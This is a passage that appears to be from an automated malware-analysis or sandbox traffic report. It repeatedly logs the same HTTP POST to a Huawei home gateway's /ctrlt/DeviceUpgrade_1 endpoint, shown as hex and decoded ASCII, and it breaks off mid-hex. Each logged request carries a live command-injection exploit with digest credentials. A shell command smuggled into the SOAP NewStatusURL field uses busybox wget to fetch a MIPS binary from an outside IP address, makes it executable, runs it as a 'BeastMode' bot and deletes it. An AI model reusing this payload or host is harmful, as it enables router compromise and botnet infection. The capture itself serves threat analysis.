2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 